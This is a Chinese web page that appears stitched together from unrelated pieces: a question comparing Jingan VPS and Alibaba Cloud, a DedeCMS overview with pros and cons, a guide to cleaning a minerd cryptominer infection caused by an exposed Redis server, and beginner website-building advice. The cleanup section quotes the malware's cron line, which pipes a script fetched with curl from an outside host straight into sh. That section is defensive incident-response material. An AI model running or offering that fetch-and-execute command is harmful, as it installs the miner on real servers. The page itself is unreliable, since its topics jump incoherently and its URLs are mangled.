景安vps和阿里云哪个好。。正在纠结中
织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,不乏有企业用户和学校等在使用本系统。
企业网站,无论大型还是中小型企业,利用网络传递信息在一定程度上提高了办事的效率,提高企业的竞争力。DedeCMS网站建设系统做各种网站,DedeCMS是什么,DedeCMS是一个自由和开放源码的内容管理系统,它是一个可以独立使用的内容发布系统(CMS)。在中国,DedeCMS属于最受人们喜爱的CMS系统。
优点
易用:使用织梦你可以用十分钟学习它,十分钟搭建一个。
完善:织梦基本包含了一个常规网站需要的一切功能。
丰富的资料:作为一个国内cms,织梦拥有完善的中文学习资料。
丰富的模版:织梦拥有大量免费的漂亮模版,你可以自由的使用它们。
缺点
缺乏灵活性:高度的功能集成造成了织梦灵活性的缺失,所以织梦扩展性并不是很好。
安全:织梦作为一个国内开源cms,社区缺乏更好技术支持和环境,所以漏洞频发。
社区:织梦的官方社区是收费的,这对于一个开源项目来说本身就是一个问题。
织梦用Mysql数据库
1 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmrcrypto-poolfr -j DROP and iptables -A OUTPUT -d xmrcrypto-poolfr -j DROP
2 chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3 pkill minerd ,杀掉进程
4 service stop crond 或者 crontab -r 删除所有的执行计划
5 执行top,查看了一会,没有再发现minerd 进程了。
6检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
/5 curl -fsSL http://wwwhaveabitchincom/pmsh0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:
 View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blogjobbolecom/94518/然后就注入了病毒,下面是解决办法和清除工作:
1 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2 打开 ~/ssh/authorized_keys, 删除你不认识的账号
3 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉
看需求吧,如果是发展前期,预算不足,个人小博客,就随意了,景安相对要便宜
就市场份额来说,阿里云就高太多了,大企业,大网站大部分都是阿里云的,阿里云的技术更强一些,云服务也更稳定,所以如果对稳定性和技术要求高的,就果断阿里云了
如果对这方面要求不太高的话,就景安
建站需要域名,服务器和建站程序
域名和服务器可以用阿里云的,大服务商比较稳定:网页链接
虚机是不太推荐,因为共享IP的虚机后期影响优化,独立IP的虚机不如服务器有性价比哈
有了域名和服务器就差建站程序了,论坛的话,可以用discuz来做,博客用dedecms或者wordpress,z-blog,企业站用dede,开源程序还有很多可以选择的
前期的话,服务器可以用win系统的,操作简单,新手也容易上手
建站大概流程就是
域名实名认证,服务器如果是国内的先备案,都可以在服务商后台操作的
都好了之后,域名解析到服务器
服务器配置环境,win系统直接用宝塔配置换,PHP+MYSQL+IIS 就可以的
服务器开设空间,绑定域名和开设数据库,这个都用宝塔来操作
上传网站程序到开设空间对应的文件夹里
访问域名搭建网站
网上都可以找到对应的教程 的,新手还是比较容易上手的哈
安全方面,服务器要再装一个安全狗,这样网站不容易被入侵
这些都好了之后,就要学seo了~增加网站在搜索引擎中的曝光率
0条评论